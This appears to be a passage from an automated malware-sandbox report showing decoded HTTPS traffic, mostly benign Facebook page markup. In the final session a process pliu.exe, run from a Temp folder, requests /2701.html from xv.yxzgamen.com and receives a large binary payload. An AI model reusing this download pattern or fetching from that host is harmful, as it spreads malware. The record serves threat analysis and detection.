2d 6d 6f 64
                                                                                    Data Ascii: 00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT3Epvf6nkWi189bU2PwKOMzwpUttkrtEwPArYhltIseCMVGSqA_Ya7RJ7vvopk-5BBLWgU5k2NHr1ltrVNXtxpuNP7Sw8enEp1ORE0hTjIHdHe1qIgXVTWFkZbOEd6MjvvlDi8HG5i2C0H3jPHgiQ\" target=\"_blank\" rel=\"nofollow\" data-lynx-mod
                                                                                    2023-02-07 18:45:36 UTC276INData Raw: 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 63 68 72 6f 6d 65 5c 75 30 30 32 35 32 46 61 6e 73 77 65 72 5c 75 30 30 32 35 32 46 39 35 36 34 37 26 61 6d 70 3b 68 3d 41 54 30 48 6f 59 6b 37 4f 64 5f 49 4a 62 48 39 6a 6d 36 76 50 5a 35 52 7a 66 69 53 57 43 43 6c 52 6b 48 50 69 36 4a 69 4a 75 31 67 64 31 61 78 51 4c 47 49 56 30 43 33 2d 4c 75 45 6e 30 4d 6b 6b 54 37 42 35 70 51 6a 65 4c 57 4d 5a 31 69 4d 4a 33 31 70 4e 62 33 74 72 4d 68 68 49 6b 37 62 44 6c 39 75 53 59 70 2d 59 59 66 34 46 4e 50 67 42 73 51 6b 57 68 5f 4b 61 66 69 51 50 67 58 78 7a 30 61 64 69 79 34 65 72 68 58 4a 45 64 7a 35 70 49 49 59 73 41 5c 22 20 74 61 72 67
                                                                                    Data Ascii: ?u=https\u00253A\u00252F\u00252Fsupport.google.com\u00252Fchrome\u00252Fanswer\u00252F95647&amp;h=AT0HoYk7Od_IJbH9jm6vPZ5RzfiSWCClRkHPi6JiJu1gd1axQLGIV0C3-LuEn0MkkT7B5pQjeLWMZ1iMJ31pNb3trMhhIk7bDl9uSYp-YYf4FNPgBsQkWh_KafiQPgXxz0adiy4erhXJEdz5pIIYsA\" targ
                                                                                    2023-02-07 18:45:36 UTC278INData Raw: 32 53 46 6e 49 7a 53 6c 77 6f 33 50 71 72 41 63 31 32 69 6c 79 30 47 49 4b 61 7a 70 7a 59 6e 52 50 4e 54 62 54 42 50 51 0d 0a
                                                                                    Data Ascii: 2SFnIzSlwo3PqrAc12ily0GIKazpzYnRPNTbTBPQ
                                                                                    2023-02-07 18:45:36 UTC278INData Raw: 32 65 64 33 0d 0a 4c 61 6a 32 63 47 35 41 68 37 53 4a 30 61 6d 48 48 71 6c 69 67 70 6f 5a 64 52 59 67 53 63 6d 5a 2d 53 52 5a 6c 75 42 78 75 4c 58 6e 51 54 4b 4e 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 5c 22 3e 53 61 66 61 72 69 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35
                                                                                    Data Ascii: 2ed3Laj2cG5Ah7SJ0amHHqligpoZdRYgScmZ-SRZluBxuLXnQTKNg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"async\">Safari\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u0025
                                                                                    2023-02-07 18:45:36 UTC279INData Raw: 75 74 74 6f 6e 5c 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 5c 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 65 5f 41 36 5c 22 3e 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 22 7d 2c 39 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30
                                                                                    Data Ascii: utton\" data-testid=\"cookie-policy-manage-dialog-accept-button\" title=\"Allow essential and optional cookies\" type=\"submit\" id=\"u_0_e_A6\">Allow essential and optional cookies\u003C\/button>\u003C\/div>\u003C\/div>\u003C\/div>"},9],["__markup_3310c0
                                                                                    2023-02-07 18:45:36 UTC281INData Raw: 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 33 39 35 5c 75 30 33 62 62 5c 75 30 33 62 62 5c 75 30 33 62 37 5c 75 30 33 62 64 5c 75 30 33 62 39 5c 75 30 33 62 61 5c 75 30 33 61 63 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 56 64 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 34 32 30 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 61 5c 75 30 34 33 38 5c 75 30 34 33 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 55 4d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 63 59 22
                                                                                    Data Ascii: ,{"__html":"\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac"},1],["__markup_3310c079_0_m_Vd",{"__html":"\u0420\u0443\u0441\u0441\u043a\u0438\u0439"},1],["__markup_3310c079_0_n_UM",{"__html":"\u05e2\u05d1\u05e8\u05d9\u05ea"},1],["__markup_3310c079_0_o_cY"
                                                                                    2023-02-07 18:45:36 UTC282INData Raw: 5f 30 5f 30 5f 6b 65 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 37 5f 72 67 22 2c 22 75 5f 30 5f 62 5f 6a 48 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6b 65 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 61 50 22 2c 22 75 5f 30 5f 63 5f 59 75 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6b 65 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 78 79 22 2c 22 75 5f 30 5f 64 5f 66 61 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6b 65 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 79 31 22 2c 22 75 5f 30 5f 65 5f 41 36 22 2c 31 2c 22 5f 5f 6d 61
                                                                                    Data Ascii: _0_0_ke"],["__elem_a588f507_0_7_rg","u_0_b_jH",1,"__markup_9f5fac15_0_0_ke"],["__elem_a588f507_0_8_aP","u_0_c_Yu",1,"__markup_9f5fac15_0_0_ke"],["__elem_45d73b5d_0_1_xy","u_0_d_fa",1,"__markup_9f5fac15_0_0_ke"],["__elem_45d73b5d_0_0_y1","u_0_e_A6",1,"__ma
                                                                                    2023-02-07 18:45:36 UTC284INData Raw: 73 65 74 75 70 44 65 6c 65 67 61 74 69 6f 6e 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 54 69 6d 65 7a 6f 6e 65 41 75 74 6f 73 65 74 22 2c 22 73 65 74 49 6e 70 75 74 56 61 6c 75 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 66 5a 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 66 5a 22 7d 2c 31 36 37 35 37 39 35 35 33 36 5d 5d 2c 5b 22 53 63 72 65 65 6e 44 69 6d 65 6e 73 69 6f 6e 73 41 75 74 6f 53 65 74 22 2c 22 73 65 74 49 6e 70 75 74 56 61 6c 75 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 4c 57 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 4c 57 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72
                                                                                    Data Ascii: setupDelegation",[],[]],["TimezoneAutoset","setInputValue",["__elem_f46f4946_0_0_fZ"],[{"__m":"__elem_f46f4946_0_0_fZ"},1675795536]],["ScreenDimensionsAutoSet","setInputValue",["__elem_f46f4946_0_1_LW"],[{"__m":"__elem_f46f4946_0_1_LW"}]],["LoginFormContr
                                                                                    2023-02-07 18:45:36 UTC285INData Raw: 5f 37 5f 72 67 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 37 5f 72 67 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 61 50 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 61 50 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c
                                                                                    Data Ascii: _7_rg"],[{"__m":"__elem_a588f507_0_7_rg"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_8_aP"],[{"__m":"__elem_a588f507_0_8_aP"},"_9ngb","._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReference","unblock",
                                                                                    2023-02-07 18:45:36 UTC287INData Raw: 72 6f 73 73 2f 78 42 50 71 35 75 45 68 6c 65 63 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6d 2f 6c 2f 30 2c 63 72 6f 73 73 2f 36 2d 38 68 65 51 2d 45 34 42 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 30 2f 6c 2f 30 2c
                                                                                    Data Ascii: ross/xBPq5uEhlec.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/6-8heQ-E4BK.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,
                                                                                    2023-02-07 18:45:36 UTC288INData Raw: 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 61 2f 6c 2f 30 2c 63 72 6f 73 73 2f 36 6e 30 41 66 6e 4b 53 51 4f 62 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 42 69 67 50 69 70 65 29 7b 64 65 66 69 6e 65 28 22 5f 5f 62 69 67 50 69 70 65 22 2c 5b 5d 2c 77 69 6e 64 6f 77
                                                                                    Data Ascii: Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/6n0AfnKSQOb.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><script>window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window
                                                                                    2023-02-07 18:45:36 UTC290INData Raw: 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 74 63 6e 79 45 48 34 69 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 74 63 6e 79 45 48 34 69 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 72 72 69 76 65
                                                                                    Data Ascii: <script nonce="tcnyEH4i">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="tcnyEH4i">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive
                                                                                    2023-02-07 18:45:36 UTC291INData Raw: 67 68 66 77 33 51 4e 55 6a 31 72 76 30 4b 77 47 5f 63 76 62 6c 4c 43 6a 69 6f 62 74 41 36 72 5a 52 47 47 4f 79 43 2d 67 33 53 5f 36 63 75 45 79 39 5a 50 35 75 61 46 35 44 2d 42 64 6a 76 39 67 78 6e 34 63 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 67 78 69 30 4e 71 76 76 73 79 31 48 5a 4a 39 67 78 59 63 67 68 66 77 33 51 4e 55 6a 31 72 76 30 4b 77 47 5f 63 76 62 6c 4c 43 6a 69 6f 62 74 41 36 72 5a 52 47 47 4f 79 43 2d 67 33 53 5f 36 63 75 45 79 39 5a 50 35 75 61 46 35 44 2d 42 64 6a 76 39 67 78 6e 34 63 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a
                                                                                    Data Ascii: ghfw3QNUj1rv0KwG_cvblLCjiobtA6rZRGGOyC-g3S_6cuEy9ZP5uaF5D-Bdjv9gxn4cY"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3gxi0Nqvvsy1HZJ9gxYcghfw3QNUj1rv0KwG_cvblLCjiobtA6rZRGGOyC-g3S_6cuEy9ZP5uaF5D-Bdjv9gxn4cY"]},-1],["cr:1083117",[],{__rc:
                                                                                    2023-02-07 18:45:36 UTC292INData Raw: 6a 62 62 43 69 65 76 6a 33 48 63 31 45 57 63 52 61 44 72 4d 54 69 6f 68 63 61 47 34 59 73 53 35 6f 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73
                                                                                    Data Ascii: jbbCievj3Hc1EWcRaDrMTiohcaG4YsS5oA"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events
                                                                                    2023-02-07 18:45:36 UTC294INData Raw: 6e 4e 51 47 77 64 67 56 72 70 68 6a 62 62 43 69 65 76 6a 33 48 63 31 45 57 63 52 61 44 72 4d 54 69 6f 68 63 61 47 34 59 73 53 35 6f 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 58 76 4d 55 31 57 65 35 63 55 4b 62 6e 62 4d 42 69 38 30 5a 7a 43 55 6a 52 64 4f 64 70 4b 72 70 4a 79 6e 4e 51 47 77 64 67 56 72 70 68 6a 62 62 43 69 65 76 6a 33 48 63 31 45 57 63 52 61 44 72 4d 54 69 6f 68 63 61 47 34 59 73 53 35 6f 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 0d 0a
                                                                                    Data Ascii: nNQGwdgVrphjbbCievj3Hc1EWcRaDrMTiohcaG4YsS5oA"]},-1],["cr:983844",[],{__rc:[null,"Aa2XvMU1We5cUKbnbMBi80ZzCUjRdOdpKrpJynNQGwdgVrphjbbCievj3Hc1EWcRaDrMTiohcaG4YsS5oA"]},-1],["cr:5278",["ReactDOM
                                                                                    2023-02-07 18:45:36 UTC294INData Raw: 65 39 35 0d 0a 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 33 31 44 59 79 54 2d 52 69 4c 55 47 77 45 4b 5f 75 6d 6b 6b 52 57 62 4b 75 37 6c 68 67 4b 75 64 36 51 6c 4a 67 6c 55 31 69 51 68 31 35 38 33 41 33 2d 62 4c 55 49 43 63 47 5a 7a 6a 43 6c 50 69 59 76 43 55 44 51 69 6e 49 36 63 39 59 2d 67 49 59 59 61 38 45 62 65 55 39 55 6f 31 78 2d 73 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 33 33 35 39 22 2c 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 2c 22 41 61 30 77 33 57 77 35 64 38 46 61 77 55 61 43 43 61
                                                                                    Data Ascii: e95-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa31DYyT-RiLUGwEK_umkkRWbKu7lhgKud6QlJglU1iQh1583A3-bLUICcGZzjClPiYvCUDQinI6c9Y-gIYYa8EbeU9Uo1x-sA"]},-1],["cr:1353359",["EventListenerImplForBlue"],{__rc:["EventListenerImplForBlue","Aa0w3Ww5d8FawUaCCa
                                                                                    2023-02-07 18:45:36 UTC296INData Raw: 38 30 31 5d 2c 5b 33 30 30 30 35 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 36 2c 35 37 33 35 38 35 5d 2c 5b 33 30 30 30 37 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 30 38 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 32 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 33 2c 38 33 38 38 30 31 5d 2c 5b 33 30 30 31 35 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 31 38 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 32 31 2c 35 34 30 38 32 33 5d 2c 5b 33 30 30 32 32 2c 35 34 30 38 31 37 5d 2c 5b 33 30 30 34 30 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 39 33 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 39 34 2c 38 30 36 30 33 33 5d 2c 5b 33 30 30 39 35 2c 38 30 36 30 33 33 5d 2c 5b 33 30 31 30 31 2c 35 34 31 35 39 31 5d 2c 5b 33 30 31 30 32 2c 35 34 31 35 39 31 5d 2c 5b 33 30 31 30 33 2c 35 34 31
                                                                                    Data Ascii: 801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541
                                                                                    2023-02-07 18:45:36 UTC297INData Raw: 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4f 2f 72 2f 5f 74 4a 31 37 73 47 79 78 4f 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 6e 63 3a 31 7d 2c 4f 37 6b 4e 4e 50 38 3a 7b 74 79 70 65 3a 22 6a 73 22 2c 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 59 2f 72 2f 75 65 5f 4f 57 6c 6b 4c 44 5a 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 6e 63 3a 31 7d 7d 2c 63 6f 6d 70 4d 61 70 3a 7b 54 72 61 6e 73 70 6f 72 74 53 65 6c 65 63 74 69 6e 67 43 6c 69 65 6e 74 53 69 6e 67 6c 65 74 6f 6e 3a 7b 72 3a 5b 22 4a 67 34 68 6f 64 35 22 2c 22 33 7a
                                                                                    Data Ascii: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz",nc:1},O7kNNP8:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/ue_OWlkLDZP.js?_nc_x=Ij3Wp8lg5Kz",nc:1}},compMap:{TransportSelectingClientSingleton:{r:["Jg4hod5","3z


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.2.349714188.114.97.3443C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:45 UTC298OUTGET /2701.html HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: xv.yxzgamen.com
                                                                                    2023-02-07 18:45:45 UTC298INHTTP/1.1 200 OK
                                                                                    Date: Tue, 07 Feb 2023 18:45:45 GMT
                                                                                    Content-Length: 571230
                                                                                    Connection: close
                                                                                    Last-Modified: Mon, 29 Aug 2022 04:55:09 GMT
                                                                                    ETag: "8b75e-5e75a116ff4a3"
                                                                                    Accept-Ranges: bytes
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V9JqxRTh%2Fzo6%2FJuH94ItPAGSUSDG844wfAXp%2FFXh2lRnlPVvVDTfZsgBv35aePfwnoZraEHRxU2bdrycEUJcY0jK%2Fi9M6Dk5iLjr7I5bNJchZSNorsArsQYd%2B0D7eHn%2F7Rc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 795e48cd08395c44-FRA
                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    2023-02-07 18:45:45 UTC299INData Raw: 50 2c cc 00 48 68 a2 6a 1e ff 91 3f e8 eb cf 4f 7d 33 e8 e1 38 76 2c 29 63 6d 6c 91 54 2f f0 cc da e3 13 56 f7 72 dc 93 17 ef b9 d6 f6 6e a7 3f 79 0d 18 6f 7a 23 56 af da b4 fe ed f5 98 4e ff 7b 1f d0 a6 ee ed e2 21 f0 cc cb f9 59 17 22 e3 9a d9 29 76 85 54 92 2e d7 2e dd 9b 1f e8 dc a4 ee 55 62 a7 56 d4 d4 2a db a9 29 c5 95 9d 38 94 ca 85 2c 17 25 16 7b 34 c2 79 57 72 41 ec 61 33 36 26 1a 18 2c e3 bc fe 18 56 f0 be ea f2 a2 6c 39 fc 79 0d c0 a4 e6 33 39 fc 79 0d ca 07 77 57 a6 6a f4 6f 78 ae 06 0d f6 e7 49 9f 9c 3b 86 aa 25 f7 11 70 b7 62 0c e8 3e da cb 6a a7 82 b6 92 a6 6a 1e 88 61 77 54 92 dc 72 a2 86 a6 6a 2e a6 12 17 6f f7 2f c5 8e 37 d4 17 dd 9a 2c 3d 75 6b a7 e1 69 df d2 2f 68 e1 eb a3 a6 6a 2a 6a ee 50 a6 6a 09 c4 88 3f e2 a5 2d 58 11 6b a7 d2 52
                                                                                    Data Ascii: P,Hhj?O}38v,)cmlT/Vrn?yoz#VN{!Y")vT..UbV*)8,%{4yWrAa36&,Vl9y39ywWjoxI;%pb>jjawTrj.o/7,=uki/hj*jPj?-XkR
